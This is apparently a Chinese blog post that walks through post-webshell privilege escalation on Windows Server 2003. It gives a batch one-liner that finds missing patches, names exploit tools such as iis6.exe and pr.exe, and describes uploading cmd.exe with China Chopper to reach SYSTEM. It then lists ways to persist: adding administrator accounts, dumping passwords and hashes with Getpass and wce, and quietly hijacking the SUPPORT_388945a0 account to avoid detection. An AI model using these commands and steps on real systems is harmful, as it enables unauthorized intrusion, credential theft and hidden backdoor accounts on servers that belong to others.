Windows 提权------IIS6.exe溢出提权

提权方式:
          操作系统漏洞提权:
               systeminfo
               查看未修补的补丁编号
               KB952004 MS09-012        PR    -pr.exe
               KB956572 MS09-012        巴西烤肉
               KB970483 MS09-020        IIS6溢出     -iis6.exe

               LPK劫持     -lpk.dll

windows 2003>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191
KB2840221 KB3000061 KB2850851 KB2711167 KB2360937
KB2478960 KB2507938 KB2566454 KB2646524 KB2645640
KB2641653 KB944653 KB952004 KB971657 KB2620712
KB2393802 KB942831 KB2503665 KB2592799 KB956572
KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|
@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows
\Temp\temp.txt
通用型>>
systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280
KB3143141 KB3134228 KB3079904 KB3077657 KB3124280
KB3045171 KB2829361 KB3000061 KB2850851 KB2707511
KB970483 KB2124261 KB2271195) do @type C:\Windows
\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /
q /a C:\Windows\Temp\temp.txt

查看未补漏洞   根据没有修补的补丁号码,到网上找利用程序 进行利用


提权的思路

  1. 查找可读可写目录。
  2. 上传cmd.exe
  3. 查看未修补补丁的漏洞编号,根据没有修补的补丁号码,到网上寻找利用程序,进行利用。
  4. 上传exp进行利用。

拿到一个WebShell 之后上传大马




查看组件支持是否支持wscript.shell命令执行组件。



执行Webshell 自带的cmd.exe 发现不可用



提示拒绝访问 说明权限不允许,我们自己上传一个cmd.exe。上传目录要求是:可读,可写,可执行


利用菜刀上传一个cmd.exe


Network Service是Windows 2003中新内置的一个被严格限制的账号。该用户可以执行一些简单的命令. 但不能直接net user 添加用户。

接下来我们执行检测   补丁号的脚本  

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280  KB3143141 KB3134228 KB3079904 KB3077657 KB3124280  KB3045171 KB2829361 KB3000061 KB2850851 KB2707511  KB970483 KB2124261 KB2271195) do @type C:\Windows \Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f / q /a C:\Windows\Temp\temp.txt


发现可以使用IIS6.0溢出提权

使用菜刀上传 iis6.exe (这里我将iis6.0exe改名为了huangxin6.exe)

NT AUTHORITYSYSTEM代表程序以系统身份运行,这是两个系统内置的系统账户。

system账户具有比administration更高的权限。

接下来 可以

                修改管理员密码
                创建一个新用户 添加到管理员组
                提取当前登录用户密码  (Getpass.exe)
                修改帮助账号(SUPPOTR_388945a0)的密码,并添加管理员组 (比较不容易被发现,推荐使用)
                提取用户密码哈希值(wce.exe)

net user 查看所有用户

query user 查看当前运行中的用户

net user 用户名 密码 /add 添加用户

net user 用户名 /active 激活用户

net user 用户名 密码 修改用户名密码
net localgroup administrators 用户名 /add 添加管理组


  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值